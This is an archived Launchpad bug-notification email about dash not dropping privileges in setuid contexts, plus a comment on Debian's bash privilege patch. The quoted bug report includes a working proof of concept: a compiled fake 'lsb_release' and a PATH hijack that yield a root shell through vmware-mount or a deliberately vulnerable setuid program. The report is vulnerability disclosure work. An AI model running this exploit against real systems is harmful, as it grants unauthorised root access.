← Back to team overview

touch-packages team mailing list archive

[Bug 1215660] Re: dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()

 

correction on my previous comment:

My point "1" is only true on Debian and derivatives. bash does drop its
privilege when setuid and called as sh without -p just like when not
called as sh, but Debian's bash package has a patch that disables that
dropping of privileges when called as sh.

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

** Bug watch added: Debian Bug tracker #52586
   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dash in Ubuntu.
https://bugs.launchpad.net/bugs/1215660

Title:
  dash does not drop privileges when euid != uid, this can cause local
  root exploits when setuid programs use system() or popen()

Status in dash package in Ubuntu:
  Triaged

Bug description:
  Poorly written setuid programs may call 'popen' or 'system' with
  incorrectly specified arguments. For instance, there is a bug in
  vmware-mount where it calls "popen('lsb-release')" (CVE-2013-1662). It
  should be "popen('/usr/bin/lsb-release')". Because of this, an
  attacker can drop a file named 'lsb-release' in . and then call
  vmware-mount, and it will happily popen the attacker controlled file
  as root.

  Now, bash has a 'privdrop' option, however debian removed this option in the 1990's:
  http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff and
  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

  Most shells will drop privs when euid != uid, because it turns out
  calling popen / system from setuid scripts is nearly impossible to get
  right (in fact, pretty much any setuid script is insanely difficult to
  write without a vulnerability in it.

  Ensure /bin/sh is dash
  antarus@goats5 ~ $ sudo ln -sf /bin/dash /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
  # whoami   
  root

  If we switched to a sane shell (like busybox for example.)
  antarus@goats5 ~ $ sudo ln -sf /bin/busybox /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("/bin/sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount

  BusyBox v1.18.5 (Ubuntu 1:1.18.5-1ubuntu4.1) built-in shell (ash)
  Enter 'help' for a list of built-in commands.

  /usr/local/google/home/antarus $ whoami
  whoami: unknown uid XXXXX # I have omitted my actual UID, needless to say it isn't uid 0 :)

  Now you may be saying 'hey i don't have vmware-mount handy' so
  instead:

  antarus@goats5 ~ $ cat /tmp/silly_setuid.c 
  #include <stdio.h>

  int main(int argc, char ** argv) {
    popen("lsb_release", "r");
  }

  antarus@goats5 ~ $ gcc /tmp/silly_setuid.c -o silly_setuid
  antarus@goats5 ~ $ sudo chown root:root silly_setuid 
  [sudo] password for antarus: 
  antarus@goats5 ~ $ sudo chmod 4755 silly_setuid 
  antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("whoami>`tty` 2>&1");}';PATH=.:$PATH silly_setuid
  antarus@goats5 ~ $ root

  Distributor ID: Ubuntu
  Description:    Ubuntu 12.04.1 LTS
  Release:        12.04
  Codename:       precise

  antarus@goats5 ~ $ apt-cache policy dash
  dash:
    Installed: 0.5.7-2ubuntu2
    Candidate: 0.5.7-2ubuntu2
    Version table:
   *** 0.5.7-2ubuntu2 0
          600 my-apt-mirror ubuntu-precise/main amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dash/+bug/1215660/+subscriptions